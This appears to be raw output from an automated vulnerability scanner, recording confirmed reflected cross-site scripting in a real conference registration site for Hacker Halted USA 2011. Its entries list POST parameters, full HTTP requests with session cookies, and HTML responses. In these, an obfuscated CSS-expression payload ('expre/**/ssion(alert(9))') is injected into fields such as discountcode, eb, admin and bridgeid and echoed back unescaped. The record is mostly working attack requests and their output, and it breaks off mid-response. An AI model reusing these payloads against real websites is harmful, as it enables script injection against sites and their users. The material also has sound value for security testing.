li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="25%" class="off">Welcome</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Select Agenda</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="25%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="bridgeid" value="3" /><!--Array( [fee] => 1 [feemessage] => )--><p class="red"><b>There are problems with the fields in red.</b></p><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="netsparker@example.com" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" class="red">ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
admin POST -1
bridgeid POST 3
categoryid POST -1
catpassword[65407] POST 3
catpassword[65411] POST 3
catpassword[65413] POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65421] POST 3
discountcode POST " stYle="x:expre/**/ssion(alert(9))
eb POST 3
eventid POST 19301
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=321c0183a7d34101840be7b67bfaab2a
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=k8gsm75r70vnqk5folllrskgd0
Content-Length: 1608
Accept-Encoding: gzip, deflate

--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="action"

preload_category
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="admin"

-1
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="bridgeid"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="categoryid"

-1
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="catpassword[65407]"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="catpassword[65411]"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="catpassword[65413]"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="catpassword[65419]"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="catpassword[65420]"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="catpassword[65421]"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="discountcode"

" stYle="x:expre/**/ssion(netsparker(9))
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="eb"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="eventid"

19301
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="language"

eng
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="reference"

3
--321c0183a7d34101840be7b67bfaab2a
Content-Disposition: form-data; name="selectcategoryid"

65410
--321c0183a7d34101840be7b67bfaab2a--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:48:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3037
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" ><a class="menu" href="/ereg/index.php?&" title="Welcome">Welcome</a></td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="3" /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" >ID Code</td><td><input type="text" name="discountcode" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST preload_category
admin POST -1
bridgeid POST 3
categoryid POST -1
catpassword[65407] POST 3
catpassword[65411] POST 3
catpassword[65413] POST 3
catpassword[65419] POST 3
catpassword[65420] POST 3
catpassword[65421] POST 3
discountcode POST 3
eb POST " stYle="x:expre/**/ssion(alert(9))
eventid POST 19301
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php?eventid=19301&
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=ed005da88399460191c5b60b4bb790cb
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=e13f3cvck2fsc3nfvsopn8q2h3
Content-Length: 1608
Accept-Encoding: gzip, deflate

--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="action"

preload_category
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="admin"

-1
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="bridgeid"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="categoryid"

-1
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="catpassword[65407]"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="catpassword[65411]"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="catpassword[65413]"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="catpassword[65419]"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="catpassword[65420]"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="catpassword[65421]"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="discountcode"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="eb"

" stYle="x:expre/**/ssion(netsparker(9))
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="eventid"

19301
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="language"

eng
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="reference"

3
--ed005da88399460191c5b60b4bb790cb
Content-Disposition: form-data; name="selectcategoryid"

65410
--ed005da88399460191c5b60b4bb790cb--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:49:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3038
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { color:#FCF9F9; }a.footer:link,a.footer:visited { font-family:Arial;font-size:12px;text-decoration:underline;color:#FCF9F9; }a.footer:hover { text-decoration:none;color:#FCF9F9; }.poweredBy { margin:0; padding:16px 0 0 10px; }</style><style>div.autosuggest { position: absolute; margin-top:5px; background:#ffffff; border:1px solid #EAE3E3; }div.autosuggest ul { list-style: none; margin:0px; padding: 5px; overflow: hidden; }div.autosuggest ul li a { display: block; padding: 1px; width: 100%; }div.autosuggest ul li a:hover { background-color: #444; }div.autosuggest ul li.as_highlight a:hover { color:#000000; background: #EAE3E3; }div.autosuggest ul li.as_highlight a { color:#000000; background: #EAE3E3; }tr.left_padding td { padding-left:15px; }</style><!---Copyright, all rights reserved 2005-2011Global Executive Business Services Limited90 Ridge Street, Suite 1, Ridgefield, CT 06877, United States--><meta property="og:title" content="Hacker Halted USA 2011" class="notranslate" /></head><body><table id="outer_table" width="750" cellspacing="0" cellpadding="0" align="center" bgcolor="#ffffff"><tr><td align="center"><div style="position:relative;width:750px;height:167px;"><a target="_blank" href="http://www.hackerhalted.com/2011/"><img src="/file_uploads/9a88cf29eb107529abbc1f9b514b01d0_HH-logo-v2011-highres.png" border="0" alt="Hacker Halted USA 2011" /></a></div></td></tr><tr bgcolor="#EAE3E3"><td style="padding:5px;"><table width="100%" cellspacing="0" cellpadding="2"><tr><td align="center" width="33%" ><a class="menu" href="/ereg/index.php?&" title="Welcome">Welcome</a></td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Attendee Information</td><td align="center"><img src="/images/arrow.png" border="0" width="13" height="10" alt="arrow" /></td><td align="center" width="33%" class="off">Registration Record</td></tr></table></td></tr><tr><td bgcolor="#0F0E0E"><table width="100%" cellspacing="0" cellpadding="2"><tr><td class="header" style="padding-left:15px;">Hacker Halted USA 2011 </td></tr></table></td></tr><tr><td id="inner_content" valign="top" style="padding:10px;height:100%;"><table width="100%" cellspacing="0" cellpadding="0"><tr><td valign="top"><div> <script type="text/javascript"> <!-- var addthis_config = { username: 'Hacker Halted USA 20', ui_cobrand: 'Hacker Halted USA 20', ui_header_color: '#566C88', services_compact: 'favorites, email, digg, delicious, google, twitter, reddit, furl, more', services_exclude: 'print' }; var addthis_share = { url: 'http://www.etouches.com/hhusa2011', title: 'Hacker Halted USA 20' }; //--> </script> <a class="addthis_button" href="https://www.addthis.com/bookmark.php?url=http://www.etouches.com/hhusa2011&pub=Hacker Halted USA 20"><img src="https://s7.addthis.com/static/btn/v2/lg-bookmark-en.gif" width="125" height="16" border="0" alt="addthis" /></a><script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=Hacker Halted USA 20"></script><br />&#160;</div><form method="post" action="newreg.php" enctype="multipart/form-data" onsubmit="convertToEntities(this);"><input type="hidden" name="action" value="submit" /><input type="hidden" name="eventid" value="19301" /><input type="hidden" name="categoryid" value="65410" /><input type="hidden" name="language" value="eng" /><input type="hidden" name="reference" value="3" /><input type="hidden" name="eb" value="\" stYle=\"x:expre/**/ssion(netsparker(9)) " /><input type="hidden" name="admin" value="-1" /><input type="hidden" name="bridgeid" value="3" /><script type="text/javascript">function togglevisibility824815(val) {}</script><table cellspacing="0" cellpadding="2" id="q824815" ><tr><td width="175" align="right" valign="top" class="standard">Email Address<font class="red">*</font></td><td valign="top" class="standard"><input class="shadow" id="email" type="text" name="input[email]" value="" style="width:350px;" alt="Email Address" /></td></tr></table><table cellspacing="0" cellpadding="2" class="standard"><tr><td width="175" align="right" valign="top" >ID Code</td><td><input type="text" name="discountcode" value="3" size="30" /><input type="submit" name="apply_code" value="Apply Code" /><br />(If you have been given a special identifier please enter it here)</td></tr><tr><td width="175" align="right" valign="top">Attendee Category</td><td>Training Pass <a href="javascript:openwindow('popups/catdetails.php?cat=65410&eventid=19301&','','height=400,width=400');" alt="More Info">[More Info]</a></td></tr><input type="hidden" name="selectcategoryid" value="65410" /></table><br /><table cellspacing="0" cellpadding="2" width="100%" ><tr id="totalcostdisplay" style="display:none;"><td colspan="2" align="center"><b>Total Cost</b> $<span id="totalcost"></span></td></tr></table><table cellspacing="0" cellpadding="2" width="100%"><tr><td width="25%">&nbsp;</td><td align="center"><br /><input type="image" src="/images/button.php?font=arial&amp;style=silver-0,0,0.png&amp;text=Continue" alt="Continue" /></td><td width="25%" class="red" align="right">* = Required Field</td></tr></table></form><script language="javascript">function altercost(grandtotal) {if (grandtotal>0) { document.getElementById('totalcostdisplay').style.display=''; }document.getElementById('totalcost').innerHTML=number_format(grandtotal,'2','.',',');}function closeallpass() {}</script></td></tr></table></td></tr><tr><td bgcolor="#ffffff"><table width="100%" cellspacing="0" cellpadding="0"><tr><td class="poweredBy"><a target="_blank" href="http://www.etouches.com/" rel="nofollow"><img src="/images/powered-by-eTouches.png" border="0" width="120" height="44" alt="Powered By eTouches" /></a></td><td align="right"><script type="text/javascript" src="https://seal.verisign.com/getseal?host_name=www.eiseverywhere.com&amp;size=S&amp;use_flash=NO&amp;use_transparent=YES&amp;lang=en"></script></td></tr></table></td></tr><tr bgcolor="#0F0E0E"><td align="center"><a class="menu" target="_blank" href="http://www.hackerhalted.com/2011/">Event Home Page</a></td></tr></table><div id="selectdescription" style="display:none;position:absolute;border:1px solid #000000;width:300px;background:#FFFFFF;padding:5px;"></div><div id="overlay" style="position:absolute;display:none;opacity:.75;filter:alpha(opacity=75);z-index:90;top:0;left:0;background-color:#000000;"></div></body></html>
- /ereg/newreg.php

/ereg/newreg.php CONFIRMED

https://www.eiseverywhere.com/ereg/newreg.php

Parameters

Parameter Type Value
action POST submit
admin POST -1
apply_code POST Apply Code
bridgeid POST " stYle="x:expre/**/ssion(alert(9))
categoryid POST 65410
discountcode POST 3
eb POST 3
eventid POST 19301
input[email] POST netsparker@example.com
language POST eng
reference POST 3
selectcategoryid POST 65410

Request

POST /ereg/newreg.php HTTP/1.1
Referer: https://www.eiseverywhere.com/ereg/newreg.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: multipart/form-data; boundary=5a484f104a4440e8b60adff248ce729a
Host: www.eiseverywhere.com
Cookie: PHPSESSID=l4igtebqf4bmh3p40jvt99lai5; regtoken=44rub361023i3hli0e195oasd1
Content-Length: 1217
Accept-Encoding: gzip, deflate

--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="action"

submit
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="admin"

-1
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="apply_code"

Apply Code
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="bridgeid"

" stYle="x:expre/**/ssion(netsparker(9))
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="categoryid"

65410
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="discountcode"

3
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="eb"

3
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="eventid"

19301
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="input[email]"

netsparker@example.com
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="language"

eng
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="reference"

3
--5a484f104a4440e8b60adff248ce729a
Content-Disposition: form-data; name="selectcategoryid"

65410
--5a484f104a4440e8b60adff248ce729a--

Response

HTTP/1.1 200 OK
Date: Mon, 25 Jul 2011 15:49:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: regtoken=deg6q5c1mrcl982h2nj51pmos4; path=/
p3p: CP="DSP CAO CUR IVD IVA CONi PUBi IND INT DEM UNI PHY ONL"
Content-Encoding:
Vary: Accept-Encoding
Content-Length: 3105
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Hacker Halted USA 2011</title><!--[if lt IE 7.]><script defer type="text/javascript" src="/include/scripts/pngfix.js"></script><![endif]--><script type="text/javascript" src="/ereg/include/scripts.js"></script><link rel="P3Pv1" href="https://www.eiseverywhere.com/w3c/p3p.xml" /><style type="text/css">html,body { margin:0px;background-color:#B1B9BF;background-image:url('/images/gradient.php?color1=8E8080&color2=B1B9BF&height=600&width=1');background-repeat:repeat-x; }td,div,font,p { font-family:Arial;font-size:12px; }td { color:#050000; }select,input,textarea { font-family:Arial;font-size:12px; }.standard { font-family:Arial;font-size:12px; }.header { font-family:Arial;font-size:13px;color:#F7F2F2;font-weight:bold; }.on { font-family:Arial;color:#FCF9F9;font-size:14px;font-weight:bold; }.off { font-family:Arial;color:#847d7d;font-size:12px; }.red { font-family:Arial;font-size:12px;color:red; }.error { background:#ffeeee;border:1px solid #ff9999; }.selectbox { color:#000;font-family:arial;font-size:8pt;background-color:#FFF; }.headercell { font-family:arial;font-size:8pt;font-weight:bold;color:#000000; }.maincell { font-family:arial;font-size:8pt;color:#000;background:#FFF;text-align:center;height:22px; }.maincellover { font-family:arial;font-size:8pt;font-weight:bold;color:#FFF;background:#000066;text-align:center;cursor:pointer; }.tablerow1 { background:#E0D5D5; }.tablerow2 { background:#C4BCBC; }a:link,a:visited { text-decoration:none;color:#C60B27; outline:none; }a:hover { color:#F90223; }a.menu:link,a.menu:visited { font-family:Arial;font-size:13px;text-decoration:none;color:#FCF9F9; }a.menu:hover { 